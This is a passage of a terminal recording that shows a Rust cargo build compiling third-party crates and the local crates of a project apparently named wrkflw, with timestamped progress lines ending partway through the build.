[25.493979, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m bit-vec v0.6.3\r\n"]
|
||||
[25.494049, "o", "\u001b[1m\u001b[36m Building\u001b[0m [===========> ] 139/270: thiserror, serde_derive, rustversion(build.rs), regex-syntax, futures-util, rustix(build.rs), strsim, time-core, regex-automata, bit-vec, tokio, zerofrom \r"]
|
||||
[25.498947, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m powerfmt v0.2.0\r\n"]
|
||||
[25.498992, "o", "\u001b[1m\u001b[36m Building\u001b[0m [===========> ] 140/270: thiserror, serde_derive, rustversion(build.rs), futures-util, rustix(build.rs), strsim, powerfmt, time-core, regex-automata, bit-vec, tokio, zerofrom \r"]
|
||||
[25.516976, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m yoke v0.7.5\r\n"]
|
||||
[25.517027, "o", "\u001b[1m\u001b[36m Building\u001b[0m [============> ] 141/270: thiserror, serde_derive, rustversion(build.rs), futures-util, rustix(build.rs), strsim, powerfmt, time-core, regex-automata, bit-vec, tokio, yoke \r"]
|
||||
[25.551361, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m clap_lex v0.7.4\r\n"]
|
||||
[25.551606, "o", "\u001b[1m\u001b[36m Building\u001b[0m [============> ] 142/270: thiserror, serde_derive, rustversion(build.rs), futures-util, rustix(build.rs), strsim, powerfmt, regex-automata, bit-vec, tokio, clap_lex, yoke \r"]
|
||||
[25.583082, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m heck v0.5.0\r\n"]
|
||||
[25.583155, "o", "\u001b[1m\u001b[36m Building\u001b[0m [============> ] 143/270: thiserror, serde_derive, rustversion(build.rs), futures-util, strsim, powerfmt, regex-automata, bit-vec, tokio, clap_lex, yoke, heck \r"]
|
||||
[25.620283, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m bit-set v0.5.3\r\n"]
|
||||
[25.620448, "o", "\u001b[1m\u001b[36m Building\u001b[0m [============> ] 144/270: thiserror, serde_derive, rustversion(build.rs), futures-util, strsim, regex-automata, bit-vec, tokio, clap_lex, yoke, bit-set, heck \r"]
|
||||
[25.620888, "o", "\u001b[1m\u001b[36m Building\u001b[0m [============> ] 145/270: thiserror, serde_derive, rustix(build), rustversion(build.rs), futures-util, strsim, regex-automata, tokio, clap_lex, yoke, bit-set, heck \r"]
|
||||
[25.668499, "o", "\u001b[1m\u001b[36m Building\u001b[0m [============> ] 146/270: thiserror, serde_derive, rustix(build), futures-util, strsim, regex-automata, tokio, clap_lex, yoke, bit-set, rustversion(build), heck \r"]
|
||||
[25.673766, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m clap_builder v4.5.34\r\n"]
|
||||
[25.673848, "o", "\u001b[1m\u001b[36m Building\u001b[0m [============> ] 147/270: thiserror, serde_derive, rustix(build), futures-util, strsim, regex-automata, tokio, yoke, bit-set, rustversion(build), heck, clap_builder \r"]
|
||||
[25.687039, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m deranged v0.4.1\r\n"]
|
||||
[25.687142, "o", "\u001b[1m\u001b[36m Building\u001b[0m [============> ] 148/270: thiserror, serde_derive, rustix(build), futures-util, strsim, regex-automata, tokio, yoke, rustversion(build), heck, clap_builder, deranged \r"]
|
||||
[25.694934, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m clap_derive v4.5.32\r\n"]
|
||||
[25.69508, "o", "\u001b[1m\u001b[36m Building\u001b[0m [============> ] 149/270: thiserror, serde_derive, clap_derive, rustix(build), futures-util, strsim, regex-automata, tokio, yoke, rustversion(build), clap_builder, deranged \r"]
|
||||
[25.702353, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m time-macros v0.2.22\r\n"]
|
||||
[25.702382, "o", "\u001b[1m\u001b[36m Building\u001b[0m [============> ] 150/270: thiserror, serde_derive, clap_derive, rustix(build), time-macros, futures-util, regex-automata, tokio, yoke, rustversion(build), clap_builder, deranged \r"]
|
||||
[25.946083, "o", "\u001b[1m\u001b[36m Building\u001b[0m [============> ] 151/270: thiserror, clap_derive, rustix(build), time-macros, futures-util, regex-automata, tokio, yoke, rustversion(build), clap_builder, serde, deranged \r"]
|
||||
[26.006998, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=============> ] 152/270: thiserror, clap_derive, rustix(build), time-macros, futures-util, regex-automata, tokio, yoke, rustversion(build), anyhow(build), clap_builder, serde \r"]
|
||||
[26.344192, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m regex v1.11.1\r\n"]
|
||||
[26.344222, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=============> ] 153/270: thiserror, clap_derive, rustix(build), futures-util, regex-automata, tokio, yoke, rustversion(build), anyhow(build), clap_builder, serde, regex \r"]
|
||||
[26.419882, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m num v0.4.3\r\n"]
|
||||
[26.419909, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=============> ] 154/270: num, clap_derive, rustix(build), futures-util, regex-automata, tokio, yoke, rustversion(build), anyhow(build), clap_builder, serde, regex \r"]
|
||||
[26.459008, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=============> ] 155/270: crossbeam-utils(build), clap_derive, rustix(build), futures-util, regex-automata, tokio, yoke, rustversion(build), anyhow(build), clap_builder, serde, regex \r"]
|
||||
[26.563875, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=============> ] 156/270: crossbeam-utils(build), rustix(build), futures-util, regex-automata, tokio, yoke, rustversion(build), anyhow(build), ahash(build), clap_builder, serde, regex \r"]
|
||||
[26.581267, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=============> ] 157/270: crossbeam-utils(build), rustix(build), futures-util, regex-automata, tokio, yoke, rustversion(build), anyhow(build), ahash(build), clap_builder, signal-hook, serde \r"]
|
||||
[26.732902, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m zerovec v0.10.4\r\n"]
|
||||
[26.733036, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=============> ] 158/270: crossbeam-utils(build), rustix(build), futures-util, zerovec, regex-automata, tokio, rustversion(build), anyhow(build), ahash(build), clap_builder, signal-hook, serde \r"]
|
||||
[26.805769, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m pin-project-internal v1.1.10\r\n"]
|
||||
[26.805815, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=============> ] 159/270: crossbeam-utils(build), rustix(build), futures-util, zerovec, pin-project-internal, regex-automata, tokio, rustversion(build), anyhow(build), ahash(build), clap_builder, serde \r"]
|
||||
[26.939474, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m mio v0.8.11\r\n"]
|
||||
[26.939612, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=============> ] 160/270: crossbeam-utils(build), futures-util, zerovec, pin-project-internal, regex-automata, tokio, mio, rustversion(build), anyhow(build), ahash(build), clap_builder, serde \r"]
|
||||
[27.135956, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m getrandom v0.2.15\r\n"]
|
||||
[27.13618, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=============> ] 161/270: crossbeam-utils(build), getrandom, zerovec, pin-project-internal, regex-automata, tokio, mio, rustversion(build), anyhow(build), ahash(build), clap_builder, serde \r"]
|
||||
[27.160029, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m iana-time-zone v0.1.62\r\n"]
|
||||
[27.160304, "o", "\u001b[1m\u001b[36m Building\u001b[0m [==============> ] 162/270: crossbeam-utils(build), getrandom, iana-time-zone, zerovec, pin-project-internal, tokio, mio, rustversion(build), anyhow(build), ahash(build), clap_builder, serde \r"]
|
||||
[27.168847, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m nom v8.0.0\r\n"]
|
||||
[27.168897, "o", "\u001b[1m\u001b[36m Building\u001b[0m [==============> ] 163/270: crossbeam-utils(build), getrandom, nom, iana-time-zone, zerovec, pin-project-internal, tokio, mio, anyhow(build), ahash(build), clap_builder, serde \r"]
|
||||
[27.201855, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m zerocopy v0.7.35\r\n"]
|
||||
[27.202076, "o", "\u001b[1m\u001b[36m Building\u001b[0m [==============> ] 164/270: crossbeam-utils(build), nom, iana-time-zone, zerovec, pin-project-internal, tokio, mio, anyhow(build), ahash(build), zerocopy, clap_builder, serde \r"]
|
||||
[27.227265, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m chrono v0.4.40\r\n"]
|
||||
[27.227339, "o", "\u001b[1m\u001b[36m Building\u001b[0m [==============> ] 165/270: crossbeam-utils(build), nom, zerovec, pin-project-internal, chrono, tokio, mio, anyhow(build), ahash(build), zerocopy, clap_builder, serde \r"]
|
||||
[27.296492, "o", "\u001b[1m\u001b[36m Building\u001b[0m [==============> ] 166/270: crossbeam-utils(build), nom, zerovec, pin-project-internal, chrono, tokio, anyhow(build), ahash(build), zerocopy, clap_builder, serde, rustversion \r"]
|
||||
[27.314139, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m pin-project v1.1.10\r\n\u001b[1m\u001b[36m Building\u001b[0m [==============> ] 167/270: crossbeam-utils(build), nom, pin-project, zerovec, chrono, tokio, anyhow(build), ahash(build), zerocopy, clap_builder, serde, rustversion \r"]
|
||||
[27.373114, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m signal-hook-mio v0.2.4\r\n"]
|
||||
[27.37324, "o", "\u001b[1m\u001b[36m Building\u001b[0m [==============> ] 168/270: crossbeam-utils(build), nom, pin-project, zerovec, chrono, tokio, signal-hook-mio, anyhow(build), ahash(build), clap_builder, serde, rustversion \r"]
|
||||
[27.415303, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m tokio-util v0.7.14\r\n"]
|
||||
[27.415331, "o", "\u001b[1m\u001b[36m Building\u001b[0m [==============> ] 169/270: crossbeam-utils(build), nom, pin-project, zerovec, tokio-util, chrono, tokio, anyhow(build), ahash(build), clap_builder, serde, rustversion \r"]
|
||||
[27.536012, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m tokio-native-tls v0.3.1\r\n"]
|
||||
[27.536162, "o", "\u001b[1m\u001b[36m Building\u001b[0m [==============> ] 170/270: crossbeam-utils(build), nom, tokio-native-tls, pin-project, zerovec, tokio-util, chrono, tokio, anyhow(build), ahash(build), clap_builder, serde \r"]
|
||||
[27.597054, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m futures-executor v0.3.31\r\n"]
|
||||
[27.597106, "o", "\u001b[1m\u001b[36m Building\u001b[0m [==============> ] 171/270: crossbeam-utils(build), nom, pin-project, zerovec, tokio-util, chrono, tokio, futures-executor, anyhow(build), ahash(build), clap_builder, serde \r"]
|
||||
[27.709368, "o", "\u001b[1m\u001b[36m Building\u001b[0m [==============> ] 172/270: crossbeam-utils(build), nom, pin-project, zerovec, anyhow, tokio-util, chrono, tokio, futures-executor, ahash(build), clap_builder, serde \r"]
|
||||
[27.716961, "o", "\u001b[1m\u001b[36m Building\u001b[0m [===============> ] 173/270: crossbeam-utils(build), rustix, nom, pin-project, zerovec, anyhow, chrono, tokio, futures-executor, ahash(build), clap_builder, serde \r"]
|
||||
[27.738433, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m clap v4.5.34\r\n"]
|
||||
[27.738489, "o", "\u001b[1m\u001b[36m Building\u001b[0m [===============> ] 174/270: crossbeam-utils(build), rustix, nom, pin-project, zerovec, anyhow, chrono, tokio, clap, ahash(build), clap_builder, serde \r"]
|
||||
[27.748759, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m fancy-regex v0.11.0\r\n"]
|
||||
[27.748798, "o", "\u001b[1m\u001b[36m Building\u001b[0m [===============> ] 175/270: crossbeam-utils(build), rustix, nom, pin-project, zerovec, anyhow, chrono, tokio, clap, ahash(build), fancy-regex, serde \r"]
|
||||
[27.928307, "o", "\u001b[1m\u001b[36m Building\u001b[0m [===============> ] 176/270: rustix, nom, pin-project, zerovec, anyhow, chrono, tokio, clap, ahash(build), fancy-regex, crossbeam-utils, serde \r"]
|
||||
[27.930598, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m fraction v0.13.1\r\n"]
|
||||
[27.930634, "o", "\u001b[1m\u001b[36m Building\u001b[0m [===============> ] 177/270: rustix, nom, pin-project, zerovec, chrono, tokio, clap, ahash(build), fraction, fancy-regex, crossbeam-utils, serde \r"]
|
||||
[28.09247, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m time v0.3.41\r\n"]
|
||||
[28.094192, "o", "\u001b[1m\u001b[36m Building\u001b[0m [===============> ] 178/270: rustix, nom, pin-project, zerovec, time, tokio, clap, ahash(build), fraction, fancy-regex, crossbeam-utils, serde \r"]
|
||||
[28.171592, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m uuid v1.16.0\r\n"]
|
||||
[28.171762, "o", "\u001b[1m\u001b[36m Building\u001b[0m [===============> ] 179/270: rustix, uuid, nom, pin-project, zerovec, time, tokio, clap, ahash(build), fancy-regex, crossbeam-utils, serde \r"]
|
||||
[28.231062, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m nix v0.27.1\r\n"]
|
||||
[28.23111, "o", "\u001b[1m\u001b[36m Building\u001b[0m [===============> ] 180/270: rustix, uuid, nom, pin-project, zerovec, time, tokio, clap, ahash(build), fancy-regex, nix, serde \r"]
|
||||
[28.244612, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m paste v1.0.15\r\n\u001b[1m\u001b[36m Building\u001b[0m "]
|
||||
[28.244867, "o", "[===============> ] 181/270: rustix, uuid, nom, pin-project, zerovec, time, tokio, clap, paste(build.rs), fancy-regex, nix, serde \r"]
|
||||
[28.286837, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m bytecount v0.6.8\r\n"]
|
||||
[28.286995, "o", "\u001b[1m\u001b[36m Building\u001b[0m [===============> ] 182/270: rustix, uuid, nom, pin-project, zerovec, time, tokio, clap, paste(build.rs), bytecount, nix, serde \r"]
|
||||
[28.342152, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m heck v0.4.1\r\n"]
|
||||
[28.342211, "o", "\u001b[1m\u001b[36m Building\u001b[0m [===============> ] 183/270: uuid, nom, pin-project, zerovec, time, tokio, clap, heck, paste(build.rs), bytecount, nix, serde \r"]
|
||||
[28.36806, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m num-cmp v0.1.0\r\n"]
|
||||
[28.368385, "o", "\u001b[1m\u001b[36m Building\u001b[0m [================> ] 184/270: nom, pin-project, zerovec, num-cmp, time, tokio, clap, heck, paste(build.rs), bytecount, nix, serde \r"]
|
||||
[28.381471, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m option-ext v0.2.0\r\n"]
|
||||
[28.381606, "o", "\u001b[1m\u001b[36m Building\u001b[0m [================> ] 185/270: nom, pin-project, zerovec, num-cmp, time, option-ext, tokio, clap, heck, bytecount, nix, serde \r"]
|
||||
[28.383891, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m hex v0.4.3\r\n"]
|
||||
[28.384002, "o", "\u001b[1m\u001b[36m Building\u001b[0m [================> ] 186/270: nom, hex, pin-project, zerovec, num-cmp, time, option-ext, tokio, clap, heck, nix, serde \r"]
|
||||
[28.42974, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m home v0.5.11\r\n"]
|
||||
[28.430048, "o", "\u001b[1m\u001b[36m Building\u001b[0m [================> ] 187/270: home, nom, hex, pin-project, zerovec, num-cmp, time, tokio, clap, heck, nix, serde \r"]
|
||||
[28.452346, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m strum_macros v0.25.3\r\n"]
|
||||
[28.452511, "o", "\u001b[1m\u001b[36m Building\u001b[0m [================> ] 188/270: home, nom, strum_macros, hex, pin-project, zerovec, num-cmp, time, tokio, clap, nix, serde \r"]
|
||||
[28.489991, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m which v4.4.2\r\n"]
|
||||
[28.490071, "o", "\u001b[1m\u001b[36m Building\u001b[0m [================> ] 189/270: nom, strum_macros, hex, pin-project, zerovec, num-cmp, time, tokio, clap, which, nix, serde \r"]
|
||||
[28.511349, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m iso8601 v0.6.2\r\n\u001b[1m\u001b[36m Building\u001b[0m [================> ] 190/270: nom, strum_macros, iso8601, pin-project, zerovec, num-cmp, time, tokio, clap, which, nix, serde \r"]
|
||||
[28.515445, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m dirs-sys v0.4.1\r\n"]
|
||||
[28.515849, "o", "\u001b[1m\u001b[36m Building\u001b[0m [================> ] 191/270: nom, strum_macros, iso8601, pin-project, zerovec, time, tokio, clap, dirs-sys, which, nix, serde \r"]
|
||||
[28.57553, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m indexmap v2.8.0\r\n"]
|
||||
[28.575846, "o", "\u001b[1m\u001b[36m Building\u001b[0m [================> ] 192/270: strum_macros, iso8601, pin-project, zerovec, indexmap, time, tokio, clap, dirs-sys, which, nix, serde \r"]
|
||||
[28.586559, "o", "\u001b[1m\u001b[36m Building\u001b[0m [================> ] 193/270: strum_macros, iso8601, pin-project, zerovec, indexmap, time, tokio, clap, serde_json, which, nix, serde \r"]
|
||||
[28.600211, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m serde_urlencoded v0.7.1\r\n"]
|
||||
[28.600611, "o", "\u001b[1m\u001b[36m Building\u001b[0m [================> ] 194/270: strum_macros, iso8601, pin-project, zerovec, indexmap, time, tokio, clap, serde_json, which, serde_urlencoded, nix \r"]
|
||||
[28.639939, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=================> ] 195/270: strum_macros, iso8601, pin-project, zerovec, indexmap, ahash, time, tokio, clap, serde_json, serde_urlencoded, nix \r"]
|
||||
[28.71242, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m serde_with v2.3.3\r\n"]
|
||||
[28.712715, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=================> ] 196/270: strum_macros, iso8601, pin-project, zerovec, indexmap, ahash, time, serde_with, tokio, clap, serde_json, serde_urlencoded \r"]
|
||||
[28.718502, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=================> ] 197/270: paste(build), strum_macros, iso8601, pin-project, zerovec, indexmap, ahash, time, serde_with, tokio, clap, serde_json \r"]
|
||||
[28.766112, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m crossbeam-epoch v0.9.18\r\n"]
|
||||
[28.766143, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=================> ] 198/270: paste(build), crossbeam-epoch, strum_macros, iso8601, pin-project, zerovec, indexmap, time, serde_with, tokio, clap, serde_json \r"]
|
||||
[28.804231, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m futures v0.3.31\r\n"]
|
||||
[28.804285, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=================> ] 199/270: paste(build), crossbeam-epoch, strum_macros, iso8601, zerovec, indexmap, time, serde_with, tokio, clap, futures, serde_json \r"]
|
||||
[28.848245, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m async-trait v0.1.88\r\n"]
|
||||
[28.848379, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=================> ] 200/270: paste(build), crossbeam-epoch, strum_macros, iso8601, zerovec, indexmap, time, serde_with, tokio, clap, serde_json, async-trait \r"]
|
||||
[28.883251, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m tinystr v0.7.6\r\n"]
|
||||
[28.88339, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=================> ] 201/270: paste(build), crossbeam-epoch, strum_macros, iso8601, zerovec, time, serde_with, tokio, clap, serde_json, tinystr, async-trait \r"]
|
||||
[28.895154, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m icu_collections v1.5.0\r\n"]
|
||||
[28.895327, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=================> ] 202/270: paste(build), crossbeam-epoch, strum_macros, zerovec, time, serde_with, tokio, clap, serde_json, tinystr, async-trait, icu_collections \r"]
|
||||
[28.951617, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m serde_yaml v0.9.34+deprecated\r\n"]
|
||||
[28.951647, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=================> ] 203/270: paste(build), serde_yaml, strum_macros, zerovec, time, serde_with, tokio, clap, serde_json, tinystr, async-trait, icu_collections \r"]
|
||||
[28.963731, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m h2 v0.3.26\r\n"]
|
||||
[28.963758, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=================> ] 204/270: paste(build), serde_yaml, strum_macros, zerovec, time, serde_with, clap, serde_json, h2, tinystr, async-trait, icu_collections \r"]
|
||||
[28.978714, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m serde_repr v0.1.20\r\n"]
|
||||
[28.978743, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=================> ] 205/270: paste(build), serde_yaml, strum_macros, serde_repr, time, serde_with, clap, serde_json, h2, tinystr, async-trait, icu_collections \r"]
|
||||
[29.061025, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m xattr v1.5.0\r\n"]
|
||||
[29.061094, "o", "\u001b[1m\u001b[36m Building\u001b[0m [==================> ] 206/270: xattr, paste(build), serde_yaml, strum_macros, serde_repr, time, serde_with, serde_json, h2, tinystr, async-trait, icu_collections \r"]
|
||||
[29.168367, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m filetime v0.2.25\r\n"]
|
||||
[29.16851, "o", "\u001b[1m\u001b[36m Building\u001b[0m [==================> ] 207/270: xattr, paste(build), serde_yaml, strum_macros, time, serde_with, serde_json, h2, filetime, tinystr, async-trait, icu_collections \r"]
|
||||
[29.200162, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m rayon-core v1.12.1\r\n"]
|
||||
[29.200297, "o", "\u001b[1m\u001b[36m Building\u001b[0m [==================> ] 208/270: paste(build), serde_yaml, strum_macros, time, serde_with, rayon-core(build.rs), serde_json, h2, filetime, tinystr, async-trait, icu_collections \r"]
|
||||
[29.260113, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m tar v0.4.44\r\n"]
|
||||
[29.260221, "o", "\u001b[1m\u001b[36m Building\u001b[0m [==================> ] 209/270: paste(build), serde_yaml, strum_macros, time, serde_with, rayon-core(build.rs), tar, serde_json, h2, tinystr, async-trait, icu_collections \r"]
|
||||
[29.277112, "o", "\u001b[1m\u001b[36m Building\u001b[0m [==================> ] 210/270: rayon-core(build), paste(build), serde_yaml, strum_macros, time, serde_with, tar, serde_json, h2, tinystr, async-trait, icu_collections \r"]
|
||||
[29.279362, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m crossbeam-deque v0.8.6\r\n"]
|
||||
[29.279518, "o", "\u001b[1m\u001b[36m Building\u001b[0m [==================> ] 211/270: rayon-core(build), paste(build), serde_yaml, strum_macros, crossbeam-deque, time, serde_with, tar, h2, tinystr, async-trait, icu_collections \r"]
|
||||
[29.328543, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m dirs v5.0.1\r\n"]
|
||||
[29.328571, "o", "\u001b[1m\u001b[36m Building\u001b[0m [==================> ] 212/270: rayon-core(build), paste(build), serde_yaml, strum_macros, crossbeam-deque, time, serde_with, dirs, tar, h2, tinystr, icu_collections "]
|
||||
[29.328594, "o", "\r"]
|
||||
[29.359226, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m crossterm v0.27.0\r\n"]
|
||||
[29.359346, "o", "\u001b[1m\u001b[36m Building\u001b[0m [==================> ] 213/270: rayon-core(build), paste(build), serde_yaml, strum_macros, time, serde_with, dirs, crossterm, tar, h2, tinystr, icu_collections \r"]
|
||||
[29.38027, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m itertools v0.11.0\r\n"]
|
||||
[29.380463, "o", "\u001b[1m\u001b[36m Building\u001b[0m [==================> ] 214/270: rayon-core(build), paste(build), serde_yaml, strum_macros, itertools, time, serde_with, crossterm, tar, h2, tinystr, icu_collections \r"]
|
||||
[29.480834, "o", "\u001b[K"]
|
||||
[29.480864, "o", "\u001b[1m\u001b[32m Compiling\u001b[0m models v0.4.0 (/Users/goku/projects/wrkflw/crates/models)\r\n"]
|
||||
[29.48099, "o", "\u001b[1m\u001b[36m Building\u001b[0m [==================> ] 215/270: rayon-core(build), paste(build), serde_yaml, strum_macros, itertools, time, crossterm, tar, h2, tinystr, icu_collections, models \r"]
|
||||
[29.749227, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m matrix v0.4.0 (/Users/goku/projects/wrkflw/crates/matrix)\r\n"]
|
||||
[29.7494, "o", "\u001b[1m\u001b[36m Building\u001b[0m [===================> ] 216/270: rayon-core(build), serde_yaml, strum_macros, itertools, time, crossterm, tar, h2, matrix, tinystr, icu_collections, models \r"]
|
||||
[29.784576, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m logging v0.4.0 (/Users/goku/projects/wrkflw/crates/logging)\r\n"]
|
||||
[29.784625, "o", "\u001b[1m\u001b[36m Building\u001b[0m [===================> ] 217/270: rayon-core(build), serde_yaml, strum_macros, itertools, time, crossterm, tar, h2, matrix, logging, tinystr, icu_collections \r"]
|
||||
[29.893603, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m utils v0.4.0 (/Users/goku/projects/wrkflw/crates/utils)\r\n"]
|
||||
[29.893669, "o", "\u001b[1m\u001b[36m Building\u001b[0m [===================> ] 218/270: rayon-core(build), serde_yaml, strum_macros, itertools, utils, time, crossterm, h2, matrix, logging, tinystr, icu_collections \r"]
|
||||
[29.974513, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m bollard-stubs v1.42.0-rc.7\r\n"]
|
||||
[29.974559, "o", "\u001b[1m\u001b[36m Building\u001b[0m [===================> ] 219/270: rayon-core(build), bollard-stubs, strum_macros, itertools, utils, time, crossterm, h2, matrix, logging, tinystr, icu_collections \r"]
|
||||
[29.991577, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m runtime v0.4.0 (/Users/goku/projects/wrkflw/crates/runtime)\r\n"]
|
||||
[29.991626, "o", "\u001b[1m\u001b[36m Building\u001b[0m [===================> ] 220/270: rayon-core(build), bollard-stubs, strum_macros, utils, time, crossterm, h2, matrix, logging, tinystr, icu_collections, runtime \r"]
|
||||
[29.996852, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m validators v0.4.0 (/Users/goku/projects/wrkflw/crates/validators)\r\n\u001b[1m\u001b[36m Building\u001b[0m [===================> ] 221/270: rayon-core(build), bollard-stubs, strum_macros, utils, time, h2, matrix, logging, tinystr, validators, icu_collections, runtime \r"]
|
||||
[30.028518, "o", "\u001b[1m\u001b[36m Building\u001b[0m [===================> ] 222/270: rayon-core(build), bollard-stubs, strum_macros, utils, paste, time, h2, matrix, tinystr, validators, icu_collections, runtime \r"]
|
||||
[30.082507, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m icu_locid v1.5.0\r\n\u001b[1m\u001b[36m Building\u001b[0m [===================> ] 223/270: rayon-core(build), bollard-stubs, strum_macros, paste, time, h2, matrix, tinystr, validators, icu_locid, icu_collections, runtime \r"]
|
||||
[30.108104, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m hyper v0.14.32\r\n"]
|
||||
[30.108153, "o", "\u001b[1m\u001b[36m Building\u001b[0m [===================> ] 224/270: rayon-core(build), bollard-stubs, strum_macros, paste, time, hyper, h2, matrix, validators, icu_locid, icu_collections, runtime \r"]
|
||||
[30.141236, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m colored v2.2.0\r\n"]
|
||||
[30.141305, "o", "\u001b[1m\u001b[36m Building\u001b[0m [===================> ] 225/270: rayon-core(build), bollard-stubs, strum_macros, paste, time, hyper, h2, colored, validators, icu_locid, icu_collections, runtime \r"]
|
||||
[30.145174, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m num_cpus v1.16.0\r\n"]
|
||||
[30.145218, "o", "\u001b[1m\u001b[36m Building\u001b[0m [===================> ] 226/270: bollard-stubs, strum_macros, num_cpus, paste, time, hyper, h2, colored, validators, icu_locid, icu_collections, runtime \r"]
|
||||
[30.20999, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m cassowary v0.3.0\r\n\u001b[1m\u001b[36m Building\u001b[0m [====================> ] 227/270: bollard-stubs, strum_macros, paste, time, hyper, h2, colored, validators, icu_locid, cassowary, icu_collections, runtime \r"]
|
||||
[30.303977, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m unicode-segmentation v1.12.0\r\n"]
|
||||
[30.30402, "o", "\u001b[1m\u001b[36m Building\u001b[0m [====================> ] 228/270: unicode-segmentation, bollard-stubs, strum_macros, paste, time, hyper, h2, colored, icu_locid, cassowary, icu_collections, runtime \r"]
|
||||
[30.392998, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m indoc v2.0.6\r\n"]
|
||||
